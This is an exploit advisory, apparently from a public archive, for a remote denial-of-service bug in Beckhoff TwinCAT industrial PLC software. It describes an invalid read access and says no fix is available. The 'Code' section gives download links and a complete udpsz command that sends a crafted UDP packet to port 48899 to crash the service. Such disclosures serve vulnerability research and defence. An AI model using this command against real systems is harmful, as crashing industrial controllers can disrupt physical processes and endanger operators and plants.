72 lines
No EOL
1.5 KiB
Text
72 lines
No EOL
1.5 KiB
Text
#######################################################################
|
|
|
|
Luigi Auriemma
|
|
|
|
Application: Beckhoff TwinCAT
|
|
http://www.beckhoff.de/twincat/
|
|
Versions: <= 2.11.0.2004
|
|
Platforms: Windows
|
|
Bug: Denial of Service
|
|
Exploitation: remote
|
|
Date: 13 Sep 2011
|
|
Author: Luigi Auriemma
|
|
e-mail: aluigi@autistici.org
|
|
web: aluigi.org
|
|
|
|
|
|
#######################################################################
|
|
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) The Code
|
|
4) Fix
|
|
|
|
|
|
#######################################################################
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
|
|
|
|
From vendor's website:
|
|
"The Beckhoff TwinCAT software system turns almost any compatible PC
|
|
into a real-time controller with a multi-PLC system, NC axis control,
|
|
programming environment and operating station."
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2) Bug
|
|
======
|
|
|
|
|
|
Denial of Service caused by an invalid read access.
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3) The Code
|
|
===========
|
|
|
|
|
|
http://aluigi.org/testz/udpsz.zip
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17835.zip
|
|
|
|
udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
4) Fix
|
|
======
|
|
|
|
|
|
No fix.
|
|
|
|
|
|
####################################################################### |